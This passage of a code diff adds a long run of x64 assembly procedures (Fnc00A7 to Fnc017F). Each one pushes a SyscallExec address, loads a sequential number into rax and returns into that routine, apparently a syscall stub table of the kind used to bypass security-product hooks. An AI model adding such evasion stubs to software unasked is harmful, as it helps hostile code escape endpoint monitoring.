+ Fnc00A7 ENDP
+ Fnc00A8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a8h
+ ret
+ nop
+ Fnc00A8 ENDP
+ Fnc00A9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00a9h
+ ret
+ nop
+ Fnc00A9 ENDP
+ Fnc00AA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00aah
+ ret
+ nop
+ Fnc00AA ENDP
+ Fnc00AB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00abh
+ ret
+ nop
+ Fnc00AB ENDP
+ Fnc00AC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00ach
+ ret
+ nop
+ Fnc00AC ENDP
+ Fnc00AD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00adh
+ ret
+ nop
+ Fnc00AD ENDP
+ Fnc00AE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00aeh
+ ret
+ nop
+ Fnc00AE ENDP
+ Fnc00AF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00afh
+ ret
+ nop
+ Fnc00AF ENDP
+ Fnc00B0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b0h
+ ret
+ nop
+ Fnc00B0 ENDP
+ Fnc00B1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b1h
+ ret
+ nop
+ Fnc00B1 ENDP
+ Fnc00B2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b2h
+ ret
+ nop
+ Fnc00B2 ENDP
+ Fnc00B3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b3h
+ ret
+ nop
+ Fnc00B3 ENDP
+ Fnc00B4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b4h
+ ret
+ nop
+ Fnc00B4 ENDP
+ Fnc00B5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b5h
+ ret
+ nop
+ Fnc00B5 ENDP
+ Fnc00B6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b6h
+ ret
+ nop
+ Fnc00B6 ENDP
+ Fnc00B7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b7h
+ ret
+ nop
+ Fnc00B7 ENDP
+ Fnc00B8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b8h
+ ret
+ nop
+ Fnc00B8 ENDP
+ Fnc00B9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00b9h
+ ret
+ nop
+ Fnc00B9 ENDP
+ Fnc00BA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00bah
+ ret
+ nop
+ Fnc00BA ENDP
+ Fnc00BB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00bbh
+ ret
+ nop
+ Fnc00BB ENDP
+ Fnc00BC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00bch
+ ret
+ nop
+ Fnc00BC ENDP
+ Fnc00BD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00bdh
+ ret
+ nop
+ Fnc00BD ENDP
+ Fnc00BE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00beh
+ ret
+ nop
+ Fnc00BE ENDP
+ Fnc00BF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00bfh
+ ret
+ nop
+ Fnc00BF ENDP
+ Fnc00C0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c0h
+ ret
+ nop
+ Fnc00C0 ENDP
+ Fnc00C1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c1h
+ ret
+ nop
+ Fnc00C1 ENDP
+ Fnc00C2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c2h
+ ret
+ nop
+ Fnc00C2 ENDP
+ Fnc00C3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c3h
+ ret
+ nop
+ Fnc00C3 ENDP
+ Fnc00C4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c4h
+ ret
+ nop
+ Fnc00C4 ENDP
+ Fnc00C5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c5h
+ ret
+ nop
+ Fnc00C5 ENDP
+ Fnc00C6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c6h
+ ret
+ nop
+ Fnc00C6 ENDP
+ Fnc00C7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c7h
+ ret
+ nop
+ Fnc00C7 ENDP
+ Fnc00C8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c8h
+ ret
+ nop
+ Fnc00C8 ENDP
+ Fnc00C9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00c9h
+ ret
+ nop
+ Fnc00C9 ENDP
+ Fnc00CA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00cah
+ ret
+ nop
+ Fnc00CA ENDP
+ Fnc00CB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00cbh
+ ret
+ nop
+ Fnc00CB ENDP
+ Fnc00CC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00cch
+ ret
+ nop
+ Fnc00CC ENDP
+ Fnc00CD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00cdh
+ ret
+ nop
+ Fnc00CD ENDP
+ Fnc00CE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00ceh
+ ret
+ nop
+ Fnc00CE ENDP
+ Fnc00CF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00cfh
+ ret
+ nop
+ Fnc00CF ENDP
+ Fnc00D0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d0h
+ ret
+ nop
+ Fnc00D0 ENDP
+ Fnc00D1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d1h
+ ret
+ nop
+ Fnc00D1 ENDP
+ Fnc00D2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d2h
+ ret
+ nop
+ Fnc00D2 ENDP
+ Fnc00D3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d3h
+ ret
+ nop
+ Fnc00D3 ENDP
+ Fnc00D4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d4h
+ ret
+ nop
+ Fnc00D4 ENDP
+ Fnc00D5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d5h
+ ret
+ nop
+ Fnc00D5 ENDP
+ Fnc00D6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d6h
+ ret
+ nop
+ Fnc00D6 ENDP
+ Fnc00D7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d7h
+ ret
+ nop
+ Fnc00D7 ENDP
+ Fnc00D8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d8h
+ ret
+ nop
+ Fnc00D8 ENDP
+ Fnc00D9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00d9h
+ ret
+ nop
+ Fnc00D9 ENDP
+ Fnc00DA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00dah
+ ret
+ nop
+ Fnc00DA ENDP
+ Fnc00DB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00dbh
+ ret
+ nop
+ Fnc00DB ENDP
+ Fnc00DC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00dch
+ ret
+ nop
+ Fnc00DC ENDP
+ Fnc00DD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00ddh
+ ret
+ nop
+ Fnc00DD ENDP
+ Fnc00DE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00deh
+ ret
+ nop
+ Fnc00DE ENDP
+ Fnc00DF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00dfh
+ ret
+ nop
+ Fnc00DF ENDP
+ Fnc00E0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e0h
+ ret
+ nop
+ Fnc00E0 ENDP
+ Fnc00E1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e1h
+ ret
+ nop
+ Fnc00E1 ENDP
+ Fnc00E2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e2h
+ ret
+ nop
+ Fnc00E2 ENDP
+ Fnc00E3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e3h
+ ret
+ nop
+ Fnc00E3 ENDP
+ Fnc00E4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e4h
+ ret
+ nop
+ Fnc00E4 ENDP
+ Fnc00E5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e5h
+ ret
+ nop
+ Fnc00E5 ENDP
+ Fnc00E6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e6h
+ ret
+ nop
+ Fnc00E6 ENDP
+ Fnc00E7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e7h
+ ret
+ nop
+ Fnc00E7 ENDP
+ Fnc00E8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e8h
+ ret
+ nop
+ Fnc00E8 ENDP
+ Fnc00E9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00e9h
+ ret
+ nop
+ Fnc00E9 ENDP
+ Fnc00EA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00eah
+ ret
+ nop
+ Fnc00EA ENDP
+ Fnc00EB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00ebh
+ ret
+ nop
+ Fnc00EB ENDP
+ Fnc00EC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00ech
+ ret
+ nop
+ Fnc00EC ENDP
+ Fnc00ED PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00edh
+ ret
+ nop
+ Fnc00ED ENDP
+ Fnc00EE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00eeh
+ ret
+ nop
+ Fnc00EE ENDP
+ Fnc00EF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00efh
+ ret
+ nop
+ Fnc00EF ENDP
+ Fnc00F0 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f0h
+ ret
+ nop
+ Fnc00F0 ENDP
+ Fnc00F1 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f1h
+ ret
+ nop
+ Fnc00F1 ENDP
+ Fnc00F2 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f2h
+ ret
+ nop
+ Fnc00F2 ENDP
+ Fnc00F3 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f3h
+ ret
+ nop
+ Fnc00F3 ENDP
+ Fnc00F4 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f4h
+ ret
+ nop
+ Fnc00F4 ENDP
+ Fnc00F5 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f5h
+ ret
+ nop
+ Fnc00F5 ENDP
+ Fnc00F6 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f6h
+ ret
+ nop
+ Fnc00F6 ENDP
+ Fnc00F7 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f7h
+ ret
+ nop
+ Fnc00F7 ENDP
+ Fnc00F8 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f8h
+ ret
+ nop
+ Fnc00F8 ENDP
+ Fnc00F9 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00f9h
+ ret
+ nop
+ Fnc00F9 ENDP
+ Fnc00FA PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00fah
+ ret
+ nop
+ Fnc00FA ENDP
+ Fnc00FB PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00fbh
+ ret
+ nop
+ Fnc00FB ENDP
+ Fnc00FC PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00fch
+ ret
+ nop
+ Fnc00FC ENDP
+ Fnc00FD PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00fdh
+ ret
+ nop
+ Fnc00FD ENDP
+ Fnc00FE PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00feh
+ ret
+ nop
+ Fnc00FE ENDP
+ Fnc00FF PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 00ffh
+ ret
+ nop
+ Fnc00FF ENDP
+ Fnc0100 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0100h
+ ret
+ nop
+ Fnc0100 ENDP
+ Fnc0101 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0101h
+ ret
+ nop
+ Fnc0101 ENDP
+ Fnc0102 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0102h
+ ret
+ nop
+ Fnc0102 ENDP
+ Fnc0103 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0103h
+ ret
+ nop
+ Fnc0103 ENDP
+ Fnc0104 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0104h
+ ret
+ nop
+ Fnc0104 ENDP
+ Fnc0105 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0105h
+ ret
+ nop
+ Fnc0105 ENDP
+ Fnc0106 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0106h
+ ret
+ nop
+ Fnc0106 ENDP
+ Fnc0107 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0107h
+ ret
+ nop
+ Fnc0107 ENDP
+ Fnc0108 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0108h
+ ret
+ nop
+ Fnc0108 ENDP
+ Fnc0109 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0109h
+ ret
+ nop
+ Fnc0109 ENDP
+ Fnc010A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 010ah
+ ret
+ nop
+ Fnc010A ENDP
+ Fnc010B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 010bh
+ ret
+ nop
+ Fnc010B ENDP
+ Fnc010C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 010ch
+ ret
+ nop
+ Fnc010C ENDP
+ Fnc010D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 010dh
+ ret
+ nop
+ Fnc010D ENDP
+ Fnc010E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 010eh
+ ret
+ nop
+ Fnc010E ENDP
+ Fnc010F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 010fh
+ ret
+ nop
+ Fnc010F ENDP
+ Fnc0110 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0110h
+ ret
+ nop
+ Fnc0110 ENDP
+ Fnc0111 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0111h
+ ret
+ nop
+ Fnc0111 ENDP
+ Fnc0112 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0112h
+ ret
+ nop
+ Fnc0112 ENDP
+ Fnc0113 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0113h
+ ret
+ nop
+ Fnc0113 ENDP
+ Fnc0114 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0114h
+ ret
+ nop
+ Fnc0114 ENDP
+ Fnc0115 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0115h
+ ret
+ nop
+ Fnc0115 ENDP
+ Fnc0116 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0116h
+ ret
+ nop
+ Fnc0116 ENDP
+ Fnc0117 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0117h
+ ret
+ nop
+ Fnc0117 ENDP
+ Fnc0118 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0118h
+ ret
+ nop
+ Fnc0118 ENDP
+ Fnc0119 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0119h
+ ret
+ nop
+ Fnc0119 ENDP
+ Fnc011A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 011ah
+ ret
+ nop
+ Fnc011A ENDP
+ Fnc011B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 011bh
+ ret
+ nop
+ Fnc011B ENDP
+ Fnc011C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 011ch
+ ret
+ nop
+ Fnc011C ENDP
+ Fnc011D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 011dh
+ ret
+ nop
+ Fnc011D ENDP
+ Fnc011E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 011eh
+ ret
+ nop
+ Fnc011E ENDP
+ Fnc011F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 011fh
+ ret
+ nop
+ Fnc011F ENDP
+ Fnc0120 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0120h
+ ret
+ nop
+ Fnc0120 ENDP
+ Fnc0121 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0121h
+ ret
+ nop
+ Fnc0121 ENDP
+ Fnc0122 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0122h
+ ret
+ nop
+ Fnc0122 ENDP
+ Fnc0123 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0123h
+ ret
+ nop
+ Fnc0123 ENDP
+ Fnc0124 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0124h
+ ret
+ nop
+ Fnc0124 ENDP
+ Fnc0125 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0125h
+ ret
+ nop
+ Fnc0125 ENDP
+ Fnc0126 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0126h
+ ret
+ nop
+ Fnc0126 ENDP
+ Fnc0127 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0127h
+ ret
+ nop
+ Fnc0127 ENDP
+ Fnc0128 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0128h
+ ret
+ nop
+ Fnc0128 ENDP
+ Fnc0129 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0129h
+ ret
+ nop
+ Fnc0129 ENDP
+ Fnc012A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 012ah
+ ret
+ nop
+ Fnc012A ENDP
+ Fnc012B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 012bh
+ ret
+ nop
+ Fnc012B ENDP
+ Fnc012C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 012ch
+ ret
+ nop
+ Fnc012C ENDP
+ Fnc012D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 012dh
+ ret
+ nop
+ Fnc012D ENDP
+ Fnc012E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 012eh
+ ret
+ nop
+ Fnc012E ENDP
+ Fnc012F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 012fh
+ ret
+ nop
+ Fnc012F ENDP
+ Fnc0130 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0130h
+ ret
+ nop
+ Fnc0130 ENDP
+ Fnc0131 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0131h
+ ret
+ nop
+ Fnc0131 ENDP
+ Fnc0132 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0132h
+ ret
+ nop
+ Fnc0132 ENDP
+ Fnc0133 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0133h
+ ret
+ nop
+ Fnc0133 ENDP
+ Fnc0134 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0134h
+ ret
+ nop
+ Fnc0134 ENDP
+ Fnc0135 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0135h
+ ret
+ nop
+ Fnc0135 ENDP
+ Fnc0136 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0136h
+ ret
+ nop
+ Fnc0136 ENDP
+ Fnc0137 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0137h
+ ret
+ nop
+ Fnc0137 ENDP
+ Fnc0138 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0138h
+ ret
+ nop
+ Fnc0138 ENDP
+ Fnc0139 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0139h
+ ret
+ nop
+ Fnc0139 ENDP
+ Fnc013A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 013ah
+ ret
+ nop
+ Fnc013A ENDP
+ Fnc013B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 013bh
+ ret
+ nop
+ Fnc013B ENDP
+ Fnc013C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 013ch
+ ret
+ nop
+ Fnc013C ENDP
+ Fnc013D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 013dh
+ ret
+ nop
+ Fnc013D ENDP
+ Fnc013E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 013eh
+ ret
+ nop
+ Fnc013E ENDP
+ Fnc013F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 013fh
+ ret
+ nop
+ Fnc013F ENDP
+ Fnc0140 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0140h
+ ret
+ nop
+ Fnc0140 ENDP
+ Fnc0141 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0141h
+ ret
+ nop
+ Fnc0141 ENDP
+ Fnc0142 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0142h
+ ret
+ nop
+ Fnc0142 ENDP
+ Fnc0143 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0143h
+ ret
+ nop
+ Fnc0143 ENDP
+ Fnc0144 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0144h
+ ret
+ nop
+ Fnc0144 ENDP
+ Fnc0145 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0145h
+ ret
+ nop
+ Fnc0145 ENDP
+ Fnc0146 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0146h
+ ret
+ nop
+ Fnc0146 ENDP
+ Fnc0147 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0147h
+ ret
+ nop
+ Fnc0147 ENDP
+ Fnc0148 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0148h
+ ret
+ nop
+ Fnc0148 ENDP
+ Fnc0149 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0149h
+ ret
+ nop
+ Fnc0149 ENDP
+ Fnc014A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 014ah
+ ret
+ nop
+ Fnc014A ENDP
+ Fnc014B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 014bh
+ ret
+ nop
+ Fnc014B ENDP
+ Fnc014C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 014ch
+ ret
+ nop
+ Fnc014C ENDP
+ Fnc014D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 014dh
+ ret
+ nop
+ Fnc014D ENDP
+ Fnc014E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 014eh
+ ret
+ nop
+ Fnc014E ENDP
+ Fnc014F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 014fh
+ ret
+ nop
+ Fnc014F ENDP
+ Fnc0150 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0150h
+ ret
+ nop
+ Fnc0150 ENDP
+ Fnc0151 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0151h
+ ret
+ nop
+ Fnc0151 ENDP
+ Fnc0152 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0152h
+ ret
+ nop
+ Fnc0152 ENDP
+ Fnc0153 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0153h
+ ret
+ nop
+ Fnc0153 ENDP
+ Fnc0154 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0154h
+ ret
+ nop
+ Fnc0154 ENDP
+ Fnc0155 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0155h
+ ret
+ nop
+ Fnc0155 ENDP
+ Fnc0156 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0156h
+ ret
+ nop
+ Fnc0156 ENDP
+ Fnc0157 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0157h
+ ret
+ nop
+ Fnc0157 ENDP
+ Fnc0158 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0158h
+ ret
+ nop
+ Fnc0158 ENDP
+ Fnc0159 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0159h
+ ret
+ nop
+ Fnc0159 ENDP
+ Fnc015A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 015ah
+ ret
+ nop
+ Fnc015A ENDP
+ Fnc015B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 015bh
+ ret
+ nop
+ Fnc015B ENDP
+ Fnc015C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 015ch
+ ret
+ nop
+ Fnc015C ENDP
+ Fnc015D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 015dh
+ ret
+ nop
+ Fnc015D ENDP
+ Fnc015E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 015eh
+ ret
+ nop
+ Fnc015E ENDP
+ Fnc015F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 015fh
+ ret
+ nop
+ Fnc015F ENDP
+ Fnc0160 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0160h
+ ret
+ nop
+ Fnc0160 ENDP
+ Fnc0161 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0161h
+ ret
+ nop
+ Fnc0161 ENDP
+ Fnc0162 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0162h
+ ret
+ nop
+ Fnc0162 ENDP
+ Fnc0163 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0163h
+ ret
+ nop
+ Fnc0163 ENDP
+ Fnc0164 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0164h
+ ret
+ nop
+ Fnc0164 ENDP
+ Fnc0165 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0165h
+ ret
+ nop
+ Fnc0165 ENDP
+ Fnc0166 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0166h
+ ret
+ nop
+ Fnc0166 ENDP
+ Fnc0167 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0167h
+ ret
+ nop
+ Fnc0167 ENDP
+ Fnc0168 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0168h
+ ret
+ nop
+ Fnc0168 ENDP
+ Fnc0169 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0169h
+ ret
+ nop
+ Fnc0169 ENDP
+ Fnc016A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 016ah
+ ret
+ nop
+ Fnc016A ENDP
+ Fnc016B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 016bh
+ ret
+ nop
+ Fnc016B ENDP
+ Fnc016C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 016ch
+ ret
+ nop
+ Fnc016C ENDP
+ Fnc016D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 016dh
+ ret
+ nop
+ Fnc016D ENDP
+ Fnc016E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 016eh
+ ret
+ nop
+ Fnc016E ENDP
+ Fnc016F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 016fh
+ ret
+ nop
+ Fnc016F ENDP
+ Fnc0170 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0170h
+ ret
+ nop
+ Fnc0170 ENDP
+ Fnc0171 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0171h
+ ret
+ nop
+ Fnc0171 ENDP
+ Fnc0172 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0172h
+ ret
+ nop
+ Fnc0172 ENDP
+ Fnc0173 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0173h
+ ret
+ nop
+ Fnc0173 ENDP
+ Fnc0174 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0174h
+ ret
+ nop
+ Fnc0174 ENDP
+ Fnc0175 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0175h
+ ret
+ nop
+ Fnc0175 ENDP
+ Fnc0176 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0176h
+ ret
+ nop
+ Fnc0176 ENDP
+ Fnc0177 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0177h
+ ret
+ nop
+ Fnc0177 ENDP
+ Fnc0178 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0178h
+ ret
+ nop
+ Fnc0178 ENDP
+ Fnc0179 PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 0179h
+ ret
+ nop
+ Fnc0179 ENDP
+ Fnc017A PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 017ah
+ ret
+ nop
+ Fnc017A ENDP
+ Fnc017B PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 017bh
+ ret
+ nop
+ Fnc017B ENDP
+ Fnc017C PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 017ch
+ ret
+ nop
+ Fnc017C ENDP
+ Fnc017D PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 017dh
+ ret
+ nop
+ Fnc017D ENDP
+ Fnc017E PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 017eh
+ ret
+ nop
+ Fnc017E ENDP
+ Fnc017F PROC
+ mov rax, SyscallExec
+ push rax
+ mov rax, 017fh
+ ret
+ nop
+ Fnc017F ENDP
